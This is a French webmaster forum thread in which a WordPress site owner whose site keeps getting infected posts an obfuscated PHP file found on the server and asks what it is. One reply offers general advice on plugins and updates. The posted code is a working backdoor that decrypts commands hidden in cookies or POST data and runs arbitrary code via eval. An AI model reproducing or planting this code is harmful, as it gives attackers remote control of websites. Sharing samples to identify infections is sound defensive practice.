Malware sur Wordpress !

Discussion dans 'Développement d'un site Web ou d'une appli mobile' créé par sigma2008, 19 Juillet 2016.

  1. sigma2008
    sigma2008 WRInaute impliqué
    Inscrit:
    18 Juin 2008
    Messages:
    775
    J'aime reçus:
    5
    Bonjour,
    J'ai un site hébergé sur une offre mutualisé Wordpress, à chaque fois (2 à 3 fois par an) mon site est infecté, je trouve des fichiers qui envoient des emails en masse dans le FTP (un peu partout dans les modules, les fichiers wordpress etc ...
    Voici le type de code que contient ces fichiers malwares :

    Code:
    <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['x71a2d93'] = "\x43\x9\x71\x40\x2c\x36\x2b\x7d\x27\x70\x73\x60\x45\x7b\x58\x2a\x5b\x21\x28\x33\x5f\x6d\x4b\x20\x34\x3b\x22\x26\x6a\x79\x59\x77\x4f\x44\x67\x35\x54\x25\x2e\x69\x39\x4e\xd\x32\x4c\x62\x3d\x63\x7e\x66\x65\x41\x57\x49\x24\x31\x50\x68\x3a\x7c\x7a\x46\x6c\x5e\x75\x2d\x48\x5d\x30\x78\x53\x56\x5a\x5c\x6e\x3c\x3f\x4d\x55\x72\x42\x37\x4a\x51\x76\x47\x23\x52\x2f\x29\x38\x6b\x61\x64\xa\x6f\x74\x3e";
    $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]] = $GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][79];
    $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]] = $GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][93];
    $GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][74];
    $GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96];
    $GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
    $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74];
    $GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
    $GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50];
    $GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][96];
    $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]] = $GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][90];
    $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][35];
    $GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] = $_POST;
    $GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] = $_COOKIE;
    @$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34], NULL);
    @$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10], 0);
    @$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50], 0);
    @$GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]](0);
    
    $hadb04790 = NULL;
    $j1b154b2 = NULL;
    
    $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][24];
    global $sa68;
    
    function ucda1dd65($hadb04790, $r4e7)
    {
        $u9b4c = "";
    
        for ($vd66f6=0; $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790);)
        {
            for ($da2388=0; $da2388<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($r4e7) && $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790); $da2388++, $vd66f6++)
            {
                $u9b4c .= $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($hadb04790[$vd66f6]) ^ $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($r4e7[$da2388]));
            }
        }
    
        return $u9b4c;
    }
    
    function q1bd628($hadb04790, $r4e7)
    {
        global $sa68;
    
        return $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($hadb04790, $sa68), $r4e7);
    }
    
    foreach ($GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] as $r4e7=>$ccfa5)
    {
        $hadb04790 = $ccfa5;
        $j1b154b2 = $r4e7;
    }
    
    if (!$hadb04790)
    {
        foreach ($GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] as $r4e7=>$ccfa5)
        {
            $hadb04790 = $ccfa5;
            $j1b154b2 = $r4e7;
        }
    }
    
    $hadb04790 = @$GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]]($GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]]($hadb04790), $j1b154b2));
    if (isset($hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]]) && $sa68==$hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]])
    {
        if ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][39])
        {
            $vd66f6 = Array(
                $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84] => @$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]](),
                $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][84] => $GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][38].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][55],
            );
            echo @$GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]]($vd66f6);
        }
        elseif ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][50])
        {
            eval($hadb04790[$GLOBALS['x71a2d93'][93]]);
        }
        exit();
    }
    
    Avez vous une idée de ce type de malware et sa provenance ?
    Merci
     
  2. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 079
    J'aime reçus:
    283
    Bonjour,

    Il faudrait vérifier le site (URL), habituellement c'est un problème de plugin.
    Sinon avoir le WordPress à jour, ainsi que les modules est habituellement suffisant.
    Vous pouvez vérifier aussi les autres sites que vous hébergez via le même espace.

    N'hésitez pas entre deux messages à présenter aussi vos avis sur les sujets du forum :
    https://www.webrankinfo.com/forum/f/demandes-davis-et-de-conseils-sur-vos-sites.36/
    pour aider les autres personnes de la communauté d'entraide.

    Cordialement.
     
  3. UsagiYojimbo
    UsagiYojimbo WRInaute accro
    Inscrit:
    23 Novembre 2005
    Messages:
    11 925
    J'aime reçus:
    77
Chargement...
Similar Threads - Malware Wordpress Forum Date
Malware S.Susp.PHP.gen... Administration d'un site Web 15 Juillet 2021
Questions WinSCP : Malwares? Passes cryptés? Administration d'un site Web 22 Mai 2015
anti-virus ou anti-Malware pour site web, lequel ? Le café de WebRankInfo 27 Mars 2013
Deux malwares contournent la sécurité de Google Play Google : l'entreprise, les sites web, les services 13 Juillet 2012
Désindexer des pages auteur avec Yoast sur Wordpress Référencement Google 15 Septembre 2021
Wordpress plugin pour cinéphiles Développement d'un site Web ou d'une appli mobile 1 Août 2021
Wordpress et le robots.txt Débuter en référencement 21 Juin 2021
Template pour un site vitrine sous Wordpress? Seo Friendly Débuter en référencement 27 Mai 2021
WordPress Analytics, Vues et Wordpress Google Analytics 21 Avril 2021
WordPress Pas sûr de ce texte alternatif dans Wordpress Débuter en référencement 8 Avril 2021